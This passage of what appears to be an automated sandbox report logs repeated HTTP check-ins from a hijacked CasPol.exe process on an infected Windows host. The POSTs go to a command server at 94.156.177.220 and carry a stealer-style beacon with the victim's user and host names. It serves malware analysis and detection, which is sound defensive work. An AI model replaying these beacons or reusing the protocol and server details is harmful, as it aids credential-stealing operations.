                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    21192.168.2.224919494.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:48.598186970 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:48.603620052 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:49.623013973 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:49 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    22192.168.2.224919594.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:49.767352104 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:49.772798061 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:50.723365068 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    23192.168.2.224919694.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:50.921240091 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:50.927161932 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:51.904679060 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:51 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    24192.168.2.224919794.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:52.042413950 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:52.047822952 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:53.014616966 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    25192.168.2.224919894.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:53.151540041 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:53.157010078 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:54.103604078 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:53 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    26192.168.2.224919994.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:54.265369892 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:54.270731926 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:55.210320950 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:55 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    27192.168.2.224920094.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:55.364408970 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:55.369833946 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:56.335345984 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:56 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    28192.168.2.224920194.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:56.832909107 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:56.838879108 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:57.801280022 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    29192.168.2.224920294.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:57.945261955 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:57.950747013 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:13:58.912656069 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    30192.168.2.224920394.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:59.068675041 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:13:59.074337959 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:00.044846058 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:13:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    31192.168.2.224920494.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:00.184854031 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:00.190440893 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:01.150998116 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    32192.168.2.224920594.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:01.523999929 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:01.529408932 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:02.482548952 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:02 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    33192.168.2.224920694.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:02.705898046 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:02.711232901 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:03.664143085 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    34192.168.2.224920794.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:04.620522976 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:04.625905991 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:05.592149019 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    35192.168.2.224920894.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:05.766252995 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:05.771817923 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:06.722024918 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    36192.168.2.224920994.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:06.863686085 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:06.869151115 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:07.836644888 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    37192.168.2.224921094.156.177.220804080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:08.016462088 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:08.021965027 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:08.988933086 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:08 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
